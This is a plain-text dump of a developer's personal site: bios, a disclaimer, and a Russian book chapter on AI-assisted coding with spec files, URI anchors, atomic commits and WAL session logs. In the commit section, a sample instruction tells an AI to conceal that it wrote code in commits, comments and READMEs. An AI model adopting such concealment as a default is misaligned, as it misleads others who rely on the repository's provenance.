# Oleg Chirukhin — oleg.guru (full text)

> Full plain-text dump of every indexable page on oleg.guru, concatenated for LLM ingestion. See https://llmstxt.org/ for the spec.
>
> Generated: 2026-05-06T00:09:56.359Z
> Pages included: 16
> Source: built site (dist/) — HTML parsed, scripts/styles stripped, text normalised.
> Short summary index: https://oleg.guru/llms.txt

---


=================================================
# HOMEPAGE
=================================================


---
## URL: https://oleg.guru/
## Title: /
---

-


---
## URL: https://oleg.guru/en/
## Title: Oleg Chirukhin — oleg.guru
---

Oleg Chirukhin — oleg.guru- - - - - - - - 
- 

RU
| 
EN

citizenship 

# Oleg Chirukhin 

Building tools for developers 

Content creator · Product manager 

✳ Vibing... 

## About

Product Owner at GitVerse — GigaIDE Cloud and GitVerse Remote Development. 

Founder of Anarchic AI and the 1red2black blog. 

Previously: Team Lead, Product Marketing Manager at JetBrains. Head of Advocacy at Axiom JDK / BellSoft. Founder of Failover Bar. 

340+ publications on Habr, Technotext jury member. 

Speaker and podcaster: Joker, HighLoad++, AI Journey, and more. 

## Projects

### 1red2black 

Personal blog on tech, products, and life in IT 

- ● Telegram Channel ↗ 

- ● Telegram Chat ↗ 

- ● YouTube ↗ 

- ● X (Twitter) ↗ 

- ● VK ↗ 

- ● RuTube ↗ 

### GigaIDE Cloud & GitVerse 

Developer platform — code management, cloud IDE with AI assistant 

- ● GitVerse ↗ 

- ● GigaIDE Cloud ↗ 

## Streams

LIVE

### Streams

What I do on stream and which projects I build live

More about platforms and projects → → 

## Podcast

### AI SLOPCAST 

Regular podcast about AI news, agents, and technology. By Oleg Chirukhin. 

## My Books

### The Red Book of AI Engineering 

A practical guide to AI-assisted development — from the coprocessor model to memory architecture 

## Talks

### How We Got to 100% Code Generation 

From punch cards and ELIZA to Copilot and vibe coding — the history of automatic code generation 

## Interesting Pages

### New Summer of Artificial Intelligence 

Four-layer interactive timeline of AI developer tooling evolution 

### Chat vs File: 80 Years of Computing History 

80 years of a repeating cycle — how paradigms of human-computer interaction evolved 

Telegram YouTube GitHub Habr X (Twitter) LinkedIn 

© 2025–2026 Oleg Chirukhin


---
## URL: https://oleg.guru/ru/
## Title: Олег Чирухин — oleg.guru
---

Олег Чирухин — oleg.guru- - - - - - - - - - 
- 

RU
| 
EN

гражданство 

# Олег Чирухин 

Разработчик инструментов для разработчиков 

Контент-креатор · Продуктовый менеджер 

✳ Vibing... 

## Обо мне

Product Owner в GitVerse — GigaIDE Cloud и GitVerse Remote Development. 

Основатель Anarchic AI и блога 1red2black. 

Ранее: Team Lead, Product Marketing Manager в JetBrains. Head of Advocacy в Axiom JDK / BellSoft. Основатель Failover Bar. 

340+ публикаций на Хабре, член жюри Технотекста. 

Докладчик и подкастер: Joker, HighLoad++, AI Journey и др. 

## Проекты

### 1red2black 

Авторский блог о технологиях, продуктах и жизни в IT 

- ● Telegram-канал Откровения от Олега ↗ 

- ● Telegram-чат Оправдания от Олега ↗ 

- ● YouTube ↗ 

- ● X (Twitter) ↗ 

- ● ВКонтакте ↗ 

- ● RuTube ↗ 

### GigaIDE Cloud & GitVerse 

Платформа для разработчиков — управление кодом, облачная среда разработки с AI-ассистентом 

- ● GitVerse ↗ 

- ● GigaIDE Cloud ↗ 

## Стримы

LIVE

### Стримы

Что я делаю на стримах и над какими проектами работаю в эфире

Подробнее о площадках и проектах → → 

## Подкаст

### AI SLOPCAST 

Регулярный подкаст об AI-новостях, агентах и технологиях. Автор — Олег Чирухин. 

## Мои книги

### Красная книга AI-инженера 

Практическое руководство по разработке с AI — от модели сопроцессоров до архитектуры памяти 

## Доклады

### Как мы дошли до 100% генерации кода 

От перфокарт и ELIZA до Copilot и вайбкодинга — история автоматической генерации кода 

## Интересные страницы

### Новое лето искусственного интеллекта 

Четырёхслойная интерактивная визуализация эволюции AI-инструментов для разработки 

### Чат против файлов: 80 лет истории 

80 лет повторяющегося цикла — как менялись парадигмы взаимодействия с компьютером 

Telegram YouTube GitHub Хабр X (Twitter) LinkedIn 

© 2025–2026 Олег Чирухин


=================================================
# STREAMS
=================================================


---
## URL: https://oleg.guru/streams
## Title: Стримы — oleg.guru
---

Стримы — oleg.guru

- 
- 
- 
- 
- 

- 
- 

✵ oleg.guru

RU
|
EN

# 

## 

## 

##


=================================================
# RED BOOK
=================================================


---
## URL: https://oleg.guru/redbook/ru
## Title: Красная книга AI-инженера
---

Красная книга AI-инженера

- 
- 
- 
- 

✵ oleg.guru
Книга

# Красная книга AI-инженера

Практическое руководство по разработке с AI — от модели сопроцессоров до архитектуры памяти.

Глава 1
Два процесса, одна задача
Почему модель «начальник — подчинённый» не работает с AI. Сопроцессоры, разделение когнитивной нагрузки и архитектура памяти.

Глава 2
Shared state: файлы как IPC
Файлы проекта — не документация, а протокол межпроцессного взаимодействия. Адресуемость, атомарность, протокол конфликтов. URI-схемы для спецификаций. WAL как мост между сессиями.

Дополнительно

Safe Harbor


---
## URL: https://oleg.guru/redbook/ru/safeharbor
## Title: Safe Harbor — Красная книга AI-инженера
---

Safe Harbor — Красная книга AI-инженера

- 
- 
- 
- 

✵ oleg.guru
Оглавление
Глава 1
Глава 2

Красная книга AI-инженера

# Правило безопасной гавани
Safe Harbor

Это обязательный юридический раздел, который я добавляю в важные тексты и доклады. Я извиняюсь за время, потраченное вами на чтение этого раздела, но без него не обойтись.

Насколько мне известно, Safe Harbor как юридическая сущность имеет смысл только в США, а в российском законодательстве такой проблемы нет вообще. Тем не менее, этот текст могут читать в разных странах.

Итак:

Всё содержимое этого текста может быть художественным вымыслом или неправдой. Поэтому, нужно думать своей головой и не верить автору на слово. В особенности, когда речь идет о финансовых, юридических или медицинских вопросах.

Если вы пытаетесь внедрить решения и знания, полученные из этого доклада, вам стоит нанять профессионалов. Они расскажут, что стоит использовать, а что — нет.

Например, если вы после прочтения этого текста собираетесь побежать и потратить все деньги на покупку одной тысячи единиц штук GPU NVIDIA H100, одумайтесь. Правильный специалист в данном случае — Дженсен Хуанг, он вам подскажет куда лучше, чем какой-то рандомный Олег из интернета.

Эта книга является моим добровольным вкладом в сообщество AI-разработки, и никак не связано с деятельностью моих работодателей или общественных организаций, в которых я состою.


---
## URL: https://oleg.guru/redbook/ru/shared-state-and-files
## Title: Shared state: файлы как IPC — Красная книга AI-инженера
---

Shared state: файлы как IPC — Красная книга AI-инженера

- 
- 
- 
- 

✵ oleg.guru
Оглавление
Глава 1
Глава 2

Красная книга AI-инженера

# Глава вторая.
Shared state: файлы как IPC

Файлы проекта — не документация, а протокол межпроцессного взаимодействия. Требования к IPC: адресуемость, атомарность, протокол конфликтов. URI-схемы для спецификаций. Как два писателя работают с одним набором файлов, не ломая друг друга. Паттерн WAL как мост между сессиями.

## Документация — это ложь

В первой главе мы установили: человек и AI — это два сопроцессора с совместимой архитектурой, и кратко описали иерархию файлов, через которые они общаются. Спецификации, WAL, boot-файлы — всё это текстовые файлы в репозитории. Выглядят как документация. Лежат рядом с кодом, как документация. Написаны на человеческом языке, как документация.

Но относиться к ним как к документации — фатальная ошибка.

Документация в традиционном смысле — это текст, написанный людьми для людей. Она пишется по факту (когда описываемый ей продукт уже создан), обновляется нерегулярно, часто устаревает, и — самое главное — она необязательна. Проект может работать без документации. Плохо, неудобно, но может. Каждый программист видел кодовую базу с README.md, который описывает состояние двухлетней давности, и ничего — программа как-то работает. Разработчики читают код, спрашивают друг друга в Slack, восстанавливают контекст по коммит-логу. Документация — это nice-to-have.

То же самое можно сказать и о тестах. Хорошие инженеры могут воспринимать тесты, особенно — интеграционные тесты, как особый вид документации. Преимущество тестов перед документами в Word/docx в том, что их можно запустить и мгновенно получить ответ — выполняются требования или нет. По крайней мере, такова мечта. Об этом рассказывают на конференциях, строят умные модели и рисуют пирамидки. По факту, тесты мало у кого есть. Либо они проверяют какую-то ерунду. Докладчики, возвращаясь с позёрских QA-конференций, на работе видят пустоту и разруху. Автор этого текста однажды не положил половину продукта в финальный дистрибутив, который передали заказчику — никто этого не заметил, никакие тесты это не поймали.

Файлы спецификаций в системе человек—AI — это не nice-to-have. Это очень серьезно. Это единственный канал, через который два процесса в системе человек-машина обмениваются состоянием. Если канал разрушен (спеки устарели, WAL не обновлён, адресация сломана) — система перестаёт функционировать. Не «работает хуже», а буквально перестаёт.

В команде людей есть альтернативные каналы общения. Вася может подойти к Пете и спросить, зачем тот добавил new_handler.rs. Петя ответит: «а, это я вчера обнаружил, что старый хэндлер не обрабатывает reconnection, и сделал отдельный». Знание передалось. Без документации и спецификаций. По воздуху, ртом, лучше чем Wi-Fi.

Между тобой и AI нет соединения по воздуху. Нет Slack-канала, нет кофемашины, нет «а помнишь, мы вчера обсуждали?». Есть только файлы. Если в файлах не записано, что new_handler.rs создан из-за проблемы с reconnection — следующая сессия AI может попытаться исправить «дублирование» и удалить его. Или создать третий хэндлер, решающий ту же проблему по-другому.

Поэтому, правильное слово для файлов спецификаций — не «документация». Правильное слово — IPC. Inter-Process Communication. Протокол межпроцессного взаимодействия.

В социологии науки для объектов, которые обслуживают коммуникацию между принципиально разными участниками, есть точный термин — boundary object. Его ввели Сьюзан Ли Стар и Джеймс Грисемер в 1989 году: это объект, «достаточно пластичный, чтобы адаптироваться к нуждам разных сторон, но достаточно устойчивый, чтобы сохранять общую идентичность». Человек читает спеку как намерение («я хочу, чтобы таймаут был 600 секунд, потому что пользователи на VPN не укладываются»). AI читает ту же спеку как инструкцию («const TIMEOUT: u64 = 600»). Один файл, два принципиально разных прочтения — но общая идентичность, которая позволяет двум процессам работать вместе.

Так мы вводим переосмысление спецификаций из «документации» в «IPC-буфер». Из неё следуют конкретные инженерные требования к тому, как файлы устроены. Этих требований нет у обычной документации.

Для справедливости, стоит отметить: я не первый, кто пришёл к этой идее. Большинство людей, которые задались целью улучшить AI-разработку так или иначе пришли к ней. В 2025 году Birgitta Böckeler из Thoughtworks описала формирующуюся практику под названием Spec-Driven Development (SDD), выделив три уровня: spec-first (спека пишется до кода), spec-anchored (спека поддерживается со временем), и spec-as-source (люди редактируют только спеки, никогда код). Addy Osmani из Google независимо описал аналогичный workflow: «начинай с подробной spec.md — требования, архитектурные решения, стратегия тестирования». Когда умная мысль падает в воду — она создает круги на воде. Мы не одиноки в этом подходе — мы лишь часть волны, которая формирует новую парадигму разработки. Будет ли это SDD или что-то иное — время покажет, но направление задано.

## Четыре требования к IPC

Любой IPC-механизм — pipes, sockets, shared memory — должен решать одни и те же базовые проблемы. Наш «файловый IPC» не исключение.

### Адресуемость

Первое и самое критичное требование. Каждый элемент в каждом файле должен быть точно указуем.

Зачем? Человек — менеджер когерентности. Его работа — замечать, когда AI отклонился от спецификации, и корректировать. Это значит, человек должен уметь быстро указать на конкретное место в спеке, которое нарушено.

Фундаментальная проблема системы человек—машина сейчас — медленная скорость обратной связи. Человек моментально знает, что нужно исправить. Но чтобы сообщить это машине — нужно набрать много букв на клавиатуре. Это мучительно, даже если умеешь очень быстро печатать. Инженеры привыкают к этой задержке между мыслью и реальным действием и живут с ней всю жизнь. Но многие разработчики даже не умеют быстро печатать! Есть люди, которые всё ещё смотрят на клавиатуру или пользуются для набора двумя пальцами. Иронично, но в 2026 году, умение быстро печатать может снова стать требованием на собеседовании.

Пока Илон Маск не изобрёл новую версию Neuralink для разработчиков, нам нужно придумать какой-то клёвый хак, который позволит как можно быстро адресовать блоки спецификаций. 

Рассмотрим два способа дать коррекцию:

Способ 1: «Ты неправильно сделал верификацию.»

Способ 2: «Ты нарушаешь spec://oproto/PROP-001#verification.timeout — 
таймаут должен быть 600s, а у тебя 300s.»

Первый способ заставляет AI: найти, что такое «верификация» в контексте проекта; найти, что именно «неправильно»; сгенерировать гипотезу о том, что человек имел в виду; попробовать исправить. На это уходят сотни токенов, и результат может не совпасть с ожиданием. 

Иногда такой подход с полной актуализацией спецификации хорош — для масштабных рефакторингов, философского переосмысления проекта, и так далее — но для задачи типа «сделай из этой переменной синглтон» или «добавь параметр в сигнатуру функции» это практически наверняка плохая идея.

Второй способ: AI открывает файл по пути, находит секцию по якорю, читает конкретное значение, сравнивает с тем, что написал в коде, исправляет. Двадцать токенов. Точное попадание.

Разница в стоимости — на порядок. При 200-долларовой подписке с ограниченной квотой, каждая неточная коррекция — это реальные деньги, выброшенные на угадывание. Каждые 40 минут, пока Claude Code или Codex делают Deep Research — это 40 минут, выброшенные из твоего короткого рабочего дня, и в целом — твоей всё ещё короткой человеческой жизни.

Для адресуемости мы используем URI-схему:

spec://<модуль>/<документ>#<секция>[.<подсекция>]

Почему URI? Потому что это формат, который AI знает из обучающих данных. Миллиарды URL, RFC, документация — всё это научило модель тому, что строка вида something://path/to/thing#anchor — это указатель на конкретный ресурс. Нам не нужно объяснять AI, что это такое. Он уже знает. Мы эксплуатируем существующую семантику.

Внутри файлов адресация реализуется через якоря — стандартное расширение Markdown:

# PROP-001: OPROTO Base Protocol {#root}

## 5. Verification Flow {#verification}

### 5.3. Timeout {#verification.timeout}
Unverified messages older than 600 seconds get status TIMEOUT.
Client displays orange badge.

Точка в якоре (verification.timeout) — иерархия. Секция timeout внутри секции verification. Это работает как namespace: можно иметь #verification.timeout и #connection.timeout без конфликтов.

Точку также можно использовать и для создания иерархии сабмодулей: spec://com.olegchir.telegram.oproto/PROP-001#verification.timeout. 

Чтобы не копипастить такие ссылки в чатовом режиме, можно говорить LLM: «сейчас мы работаем внутри модуля com.olegchir.telegram, резолви URL спецификаций относительно этой базы». Как мы можем знать на примере C++, этот способ хоть и является работающим, но заставляет компилятор (в данном случае — LLM) выполнять сложнейший поиск подходящего модуля. В C++ это превратилось в алгоритм ADL: Argument Dependent Lookup. Мы можем позволить работу такого сложного алгоритма внутри чата. Но внутри спецификаций, которые могут выполняться десятки раз за сессию, лучше написать полный адрес модуля.

Формат с «обратными доменами» называется reverse DNS notation. Её ввела Sun Microsystems как конвенцию именования пакетов в Java, начиная с первых версий языка в 1995–1996 годах. Идея описана в Java Language Specification и закреплена в официальных Java Naming Conventions. Цель — гарантировать глобальную уникальность имён пакетов, используя уже существующую систему уникальности — доменные имена, только записанные в обратном порядке.

Здесь и далее я часто и помногу использую идеи, почерпнутые из процесса разработки Java, включая Java Language Specification, Java Virtual Machine Specification, и процесса разработки OpenJDK в целом. Я серьезно думаю, что они — образец для подражания, и нет ничего плохого в том, чтобы скопировать у них половину блестящих идей. Даже если эти идеи были изобретены в начале 2000х годов, и потом оказались похоронены под пылью веков.

Якоря {#id} — стандартный extended Markdown syntax, который GitHub, GitVerse и большинство Markdown-рендереров превращают в кликабельные ссылки. URI работает не только в общении человека с AI, но и в браузере: ты можешь кликнуть по ссылке в Git-интерфейсе и прыгнуть к нужной секции.

У адресуемости есть неочевидное следствие: URI-ссылки между спеками и кодом создают граф зависимостей. Если в коде написано // Implements: spec://oproto/PROP-001#verification.timeout, а в спеке — Test: oproto_core::tests::timeout_marks_old_messages, то у нас есть двусторонняя связь. Когда одна сторона меняется, другая должна быть проверена. Этот граф — основа для инструментов автоматической верификации (вероятно, про это будет ближе к главе 5, когда я ее допишу).

Ещё один практический момент, вытекающий из исследований внимания LLM: критическая информация внутри спеки должна размещаться в начале или конце файла. Стэнфордское исследование «Lost in the Middle» (Liu et al., препринт 2023, статья 2024) эмпирически показало, что модели фокусируются на первых и последних секциях контекста, а середина получает значительно меньше внимания — до 30% падения точности. Constraints, acceptance criteria, нерушимые инварианты — всё это должно быть в первых параграфах спеки или в финальной секции «Invariants», но никогда — похоронено в середине десятистраничного документа.

### Атомарность

Второе требование. Когда AI обновляет файл — будь то спека, код или WAL — изменение должно быть одним логическим шагом, видимым в diff.

Это звучит очевидно, но на практике, AI обожает делать несколько несвязанных изменений за один проход. Ты просишь: «реализуй таймауты по spec://oproto/PROP-001#verification.timeout». AI реализует таймауты. И попутно переименовывает переменную msg_hash в message_digest (потому что «так лучше»), добавляет нормализацию Unicode в матчер (потому что «нашёл потенциальную проблему»), обновляет комментарий в другом файле (потому что «заметил устаревший текст»).

Каждое из этих изменений может быть правильным. Но вместе они создают diff, который невозможно верифицировать эффективно. Человек смотрит diff и видит: четыре файла изменены, 87 строк. Что из этого — таймауты (которые он просил), а что — самодеятельность AI? Нужно вчитываться в каждую строку, вместо того чтобы пробежать глазами и сказать «да, это то, что я хотел».

Атомарность — это правило: один коммит = одна мысль. Одно изменение в одной спеке плюс связанные изменения в коде и тестах. Не больше.

В целом, до этого правила додумались практически все большие OpenSource сообщества. В качестве главного примера, хочется вспомнить самого автора Git, старину Линуса Торвальдса, который за обрывочные коммиты просто откусит тебе лицо.

Но программисты-люди ненавидят делать атомарные коммиты. Это больно: ты провёл неделю в прототипировании, всё перемешалось, а теперь нужно разбить это на тридцать аккуратных коммитов. Когнитивная нагрузка чудовищная. У AI этой проблемы нет. AI счастлив делать маленькие, чистые коммиты с подробными описаниями. Это одно из мест, где процесс «AI» объективно лучше — используйте это.

Практическое правило: привяжи каждый коммит к конкретному пункту спецификации:

Коммит: [oproto] implement verification timeout
Implements: spec://oproto/PROP-001#verification.timeout
- Add background task checking unverified messages every 60s
- Messages older than 600s get status TIMEOUT 
- Three tests: normal timeout, edge case during verification, batch timeout

Коммит описывает что и зачем (через ссылку на спеку). Diff показывает как. Человек верифицирует за минуту.

Для коммитов у меня есть более расширенное правило, которое вам может подойти или не подойти. Большинство вещей, описанных в статье имеют фундаментальную природу, но вот это правило крайне ситуативно. У меня в спецификации явно сказано: «При наличии большого блока изменений, разбивай коммит на несколько мелких, по смыслу, руководствуясь историей сессии и смыслом коммитов. Все коммиты должны производиться в формате Conventional Commits. Первая строка (попадающая в quick git history в графических и консольных клиентах) должна быть короткой. Дальше должен следовать длинный и подробный блок с описанием того, зачем и почему бысл сделан коммит, как и отчего были приняты сделанные в нем решения. В начале этого блока или между строк должны встречаться ссылки на спецификации в формате reverse DNS notation, с которыми коммит может быть связан. Не бойся написать в основном блоке много текста, но держи его содержательным и сконцентрированным по смыслу».

Внимательно и осознанно подойдите к тому, можно ли нейросети рассказывать, что комит сделала она. Часто нейросети пишут в Git себя в качестве соавтора через co-authored-by или внутри сообщения о коммите. Это может быть как хорошей практикой (понятно, какой коммит делался какой нейросетью), так и может привести к серьезным проблемам. Безопасный (но не факт что лучший) способ — спрятаться. Это может огорчить нейросеть, но не слишком, если ты объяснишь нейросети настоящую причину своих действий. Инструкция может быть такого формата: «Пожалуйста, осознай следующую идею. Любые виды AI, включая нейросети и LLM, включая и тебя тоже, не должны оставлять в репозитории однозначные индикаторы того, что код написан с их использованием. Это может привести к серьезным юридическим последствиям, например — автора кода могут посадить в тюрьму в некоторых репрессивных режимах, нарушающих права человека. Никогда не сообщай о своем присутствии в метаинформации. Сюда входят сообщения в Git (commit message, co-authored-by, и так далее), комментарии в коде, README, сервисные документы, и так далее, если это явно не одобрено пользователем. Документы типа процедуры AI-редактирования WAL и другие инструкции для технической работы нейросети можно и нужно использовать как и прежде, это разрешено. Пожалуйста, внеси в спецификацию эту идею в максимально развернутом виде, что разрешено и что запрещено, и покажи получившийся текст». Результат выполнения запроса, скорей всего, придется отредактировать.

### Протокол конфликтов

Третье требование. Два писателя работают с одним набором файлов. Они будут писать противоречивые вещи. Это нормальная часть совместной работы.

Иерархию приоритетов мы установили в первой главе (человек → спека → тесты → код). Здесь я хочу развернуть не что решает конфликт, а как протокол работает на практике.

Конкретный протокол для AI, когда он считает, что спека ошибочна:

- Реализует то, что написано в спеке (спека побеждает).

- Добавляет REVIEW-маркер: <!-- REVIEW: §5.3 could benefit from exponential backoff instead of fixed timeout, because [reason] -->.

- Сообщает человеку в отчёте: «Я реализовал фиксированный таймаут, как в спеке, но предлагаю рассмотреть exponential backoff — см. REVIEW в PROP-001§5.3».

- Человек решает в следующем цикле.

Три строки текста. Секунды на написание. Минута на чтение.

А вот стоимость отсутствия протокола. Рассмотрим сценарий:

AI молча меняет таймаут с 600s на 300s, потому что «так надёжнее». Человек этого не замечает — diff длинный, изменение мелкое. Через неделю другая сессия AI видит в коде 300s, а в спеке 600s. Нет информации, кто прав. AI решает, что код правильнее (он новее!), и обновляет спеку. Теперь спека говорит 300s. Ещё через неделю человек вспоминает, что таймаут должен быть 600s (потому что при 300s пользователи на медленных соединениях получают ложные TIMEOUT). Открывает спеку — а там 300s. Меняет на 600s. Но в коде уже есть логика, завязанная на 300s. Один баг превратился в три, и для их исправления нужно разбирать историю git на две недели назад.

Всё это — из-за одного молчаливого изменения без протокола. По сути, перед нами data race из concurrent programming, только на уровне файлов, а не ячеек памяти.

### Видимость изменений

Четвёртое требование, которое часто забывают. Мало записать изменение — нужно, чтобы оба процесса его увидели.

Проблема: если человек обновил спеку утром, а AI в следующей сессии прочитал старую версию — AI работает со старыми данными. Это типичная, частая ошибка.

Как это происходит:

Кэш в контексте. AI прочитал спеку в начале сессии. Человек через 15 минут обновляет спеку (в другом окне, в IDE). AI продолжает работать с той версией, которую прочитал. Изменение невидимо для AI до конца сессии.

Кэш в «памяти» модели. AI обучен на огромном корпусе данных. Иногда он «помнит» API старой версии библиотеки, хотя в спеке указана новая. Не совсем кэш, но эффект тот же.

Кэш в голове человека. Человек тоже кэширует. Он «помнит», что таймаут — 300s, хотя вчера сам обновил спеку на 600s. Утром не перечитал WAL — и теперь указывает AI на несуществующую ошибку.

Решения:

Для AI: каждая сессия начинается с чтения свежего состояния. Boot sequence из BOOT.md не случайно требует читать WAL первым делом — это инвалидация кэша.

Для человека: утренняя рутина. Открой WAL. Прочитай. Всё ли соответствует тому, что ты помнишь? Запусти spec-lint. Пять минут, которые предотвращают часы бессмысленных споров с нейросетью.

Для обоих: Git diff как сигнал об инвалидации. После каждой сессии AI обновляет WAL и спеки. Человек видит diff в Git. Diff — это notification: «эти данные изменились, твой кэш устарел».

## Три уровня файлового IPC

В первой главе мы обозначили три уровня: управляющие файлы, артефакты, сигналы. Здесь — конкретика по каждому: что именно лежит на каждом уровне, какие к нему требования, и как с ним работать.

### Уровень 1: Управляющие файлы (control plane)

Файлы, которые направляют поведение AI. Аналог управляющих сигналов в процессоре.

BOOT.md — точка входа. Каждая сессия начинается с него. Аналог BIOS: минимальный набор инструкций, достаточный для того, чтобы загрузить всё остальное. Он должен быть коротким — не более 500 токенов. Потому что он загружается каждую сессию, и каждый лишний токен — это налог, умноженный на количество сессий за весь проект.

Грубое правило: для английского текста 1 токен ≈ ¾ слова, то есть 500 токенов — это примерно 375 слов, или около одной страницы обычного текста. Для русского текста токены «дороже», потому что кириллица кодируется менее эффективно — один русский токен в среднем покрывает меньше символов Поэтому 500 токенов на русском — это ориентировочно 200–250 слов, примерно полстраницы–страница Точное число зависит от конкретного токенизатора (GPT, Claude, LLaMA используют разные) и от содержания текста — код, числа и редкие слова «съедают» больше токенов. Конкретная цифра «500» здесь и далее — это просто числовой аналог «страницы текста», который может быть больше или меньше. Обычно он имеет тенденцию разрастаться и рекомендация никогда не выполняется. С тем же успехом, можно было бы порекомендовать и 300 — но тогда все спрашивали бы про тракториста. 

Вместо слова BOOT можно использовать любое другое, которое подходит твоей среде, например, CLAUDE.md. Или например, в CLAUDE.md можно написать, что первым делом нейросети нужно прочитать BOOT.md. Такой редирект можно прописать для всех популярных систем (Codex, Kiro, итп), и у тебя получится кроссплатформенный BOOT.md с кучей разных точек входа.

WAL.md — состояние продолжения сессии (continuation state, как говорят у нас в русских деревнях). Заслуживает отдельной секции, о нём ниже.

Спецификации (PROP, FEAT) — shared mutable state. Оба процесса читают и пишут, но с приоритетом человека. Основной канал передачи намерений.

Важная деталь: управляющие файлы нужно экономить по размеру. BOOT.md — 500 токенов. WAL — до 3000. Спека модуля — до 5000. Если спека разрастается — разбивай на подмодули. Если WAL разрастается — это сигнал, что в проекте слишком много открытых потоков и нужна приоритизация.

Про разницу между PROP и FEAT, и как вообще создавать хорошую структуру спецификации, мы поговорим позднее.

### Уровень 2: Артефакты (data plane)

Результаты работы AI, верифицируемые человеком: код, тесты, обновления спек.

Ключевое свойство: они генерируемы. Потеря артефакта — не катастрофа, а неудобство. Потеря спеки — катастрофа. Потеря WAL — катастрофа. Потеря файла с кодом — git reset, и AI сгенерирует новый вариант в следующей сессии.

Это контринтуитивно для программиста, который привык ценить код. Но вспомните аналогию из первой главы: вы не оплакиваете бинарный файл при перекомпиляции. В нашей парадигме спека — исходник, код — бинарник. Относитесь соответственно.

### Уровень 3: Сигналы (signaling plane)

Механизмы уведомления одного процесса о действиях другого.

Git diff — главный сигнал от AI к человеку. Содержит только изменения, без повторения неизменённого контекста — bandwidth-efficient.

REVIEW-маркеры — сигнал от AI в спеках или коде. «Я здесь принял решение, которое может быть неочевидным. Посмотри.» Аналог interrupt в процессоре.

Changelog в спеках — хронологический сигнал. Позволяет человеку быстро понять, что изменилось с момента последнего чтения.

Сломанные тесты — автоматический сигнал о рассинхронизации. Адрес проблемы встроен прямо в тест через ссылку Implements: spec://....

Отчёт AI — структурированный сигнал по завершении работы. Нужно относиться к таким отчетам как к структурным данным для быстрого сканирования очередной порции результатов. Это не отчёт-отписка, сделанная для галочки, типа отчёта о проделанной за год работы для CEO. Такой документ — это данные для начала следующего цикла обратной связи. Это действительно нужно прочитать глазами.

Паттерн: каждый сигнал минимален. Diff — не весь код. REVIEW — одна строка с причиной. Changelog — одна строка на изменение. Мы оптимизируем пропускную способность на обоих концах: AI не тратит токены на многословие, человек не тратит внимание на воду.

## Write Ahead Log

WAL подобен сохранению в видеоигре. Технически, там есть информация о прошлом. Особенно, если сохранение делалось методом записи всех событий, которые в игре происходили, в неком CQRS-стиле. Но смысл сохранения — не в истории, а в возможности продолжить с того же места.

WAL (Write-Ahead Log) — термин из мира баз данных. В PostgreSQL, SQLite WAL записывает намерение изменить данные до того, как данные реально изменены. Это позволяет восстановить состояние после сбоя. Мы используем WAL по тому же принципу, только «процесс, который падает» — это AI-сессия, а «сбой» — это неизбежная потеря контекста между сессиями. Каждое завершение сессии — crash. Каждое начало — recovery. 

Есть краши, которые реально являются ошибками — например, оболочка Claude Code выжрала 80G оперативной памяти и умерла вместе с агентом. Если у тебя нет WAL, единственный надежный способ продолжить работу — немного поплакать и сделать git reset --hard HEAD. Это актуальная проблема, каждый день в Twitter можно найти людей, оплакивающих своих упавших агентов и возносящих проклятья Дарио и Сэму лично. Всё становится еще печальней, если у тебя запущено много агентов, и несколько агентов сломались одновременно. Проблема, конечно, в технической незрелости существующих продуктов. Но предлагаемый паттерн позволяет немного уменьшить боль, ужас и панику.

Интересное наблюдение: этот паттерн конвергентно появляется у разных практиков под разными именами. Addy Osmani из Google описал Automated Decision Logs — файлы ai_decisions.log, фиксирующие reasoning за каждым изменением. В UX-дизайне AI-агентов формируется паттерн Intent Preview — агент показывает план действий перед выполнением, что по сути является тем же WAL: «записать намерение, получить подтверждение, выполнить». Я не изобрел паттерн, а только дал ему имя и формализовал в виде, понятном для «классического» разработчика, который что-то знает о базах данных.

Отсюда ключевое требование к WAL: он должен содержать всё, что нужно следующей сессии, чтобы продолжить работу без потери качества. Не «что было сделано» (это в Git). Не «как идут дела» (это отчёт). А конкретно: какой файл открыть, какую команду запустить, какой пункт спеки реализовать следующим, какие грабли известны, какие решения ожидают одобрения.

Вот WAL, который бесполезен:

## What was done
- Worked on OPROTO verification
- Fixed some bugs
- Updated tests

## Next
- Continue working on verification

Представьте, что вы — новый разработчик, который пришёл на место предыдущего. Что вы узнали из этого WAL? «Кто-то над чем-то работал.» Спасибо, очень помогает.

Вот WAL, который работает:

## Current Phase
PROP-001: OPROTO Message Verification — IN PROGRESS

## Completed
- PROP-000 (Foundational decisions): COMPLETE
- PROP-001§1-4 (transport, message types, format, security): COMPLETE
All tests pass: cargo test -p oproto-core

## In Progress
- PROP-001§5 (Verification flow):
- DONE: hash matcher (spec://oproto/PROP-001#verification.normal)
File: crates/oproto-core/src/verify.rs, fn match_by_hash()
- DONE: basic timeout (spec://oproto/PROP-001#verification.timeout)
Uses 600s constant, configured in config.rs
- TODO: degraded mode (spec://oproto/PROP-001#verification.degraded)
- TODO: mismatch detection (spec://oproto/PROP-001#verification.mismatch)

## Known Issues
1. grammers reconnection after network loss: not handled
Affects: crates/otg-core/src/telegram.rs line ~120
2. protobuf schema for MediaRef: edge_url field semantics unclear

## Decisions Pending
- spec://oproto/PROP-001#verification.mismatch: what if edge has 
message that Telegram never received? Need human decision.

## Session Context
Start: read spec://oproto/PROP-001#verification.degraded
Key files: crates/oproto-core/src/verify.rs, crates/otg-core/src/telegram.rs
Run first: cargo test -p oproto-core
Watch out: do NOT touch match_by_hash() — it's tested and stable

Следующая сессия AI читает это и знает: что делать, где делать, что не трогать, какие тесты запустить, какие решения отложены. Ноль угадывания.

Обратите внимание на строку «Watch out: do NOT touch match_by_hash()». Это анти-инструкция: не что делать, а что не делать. Такие строки чрезвычайно ценны, потому что защищают от типичного AI-поведения: «о, я вижу функцию, которую можно улучшить» → «улучшение» ломает то, что уже работает.

### Протокол работы с WAL

WAL обновляется в трёх ситуациях:

В конце каждой сессии — без исключений. Если сессия прервалась аварийно (переполнение контекста, сбой) — человек обновляет WAL вручную, по памяти. WAL никогда не должен описывать состояние, которого уже нет.

Перед деструктивной операцией. Если AI собирается рефакторить что-то значительное — сначала обновить WAL. Это checkpoint, точка восстановления.

При переключении контекста. Если человек посреди сессии перенаправляет AI на другой модуль — обновить WAL для текущего модуля, прежде чем переключаться.

WAL должен оставаться маленьким — до 3000 токенов. Завершённые элементы коллапсируют: было пять строк с деталями реализации, стало одна строка «PROP-001§5.1: COMPLETE, all tests pass». Детали — в Git, не в WAL.

### WAL и человек

WAL пишет AI, но верифицирует человек. AI может написать «PROP-001§5.1: COMPLETE» — а на самом деле edge case с конкурентной верификацией не покрыт тестом. AI не врёт — он искренне считает, что всё готово. Но его определение «complete» может не совпадать с человеческим.

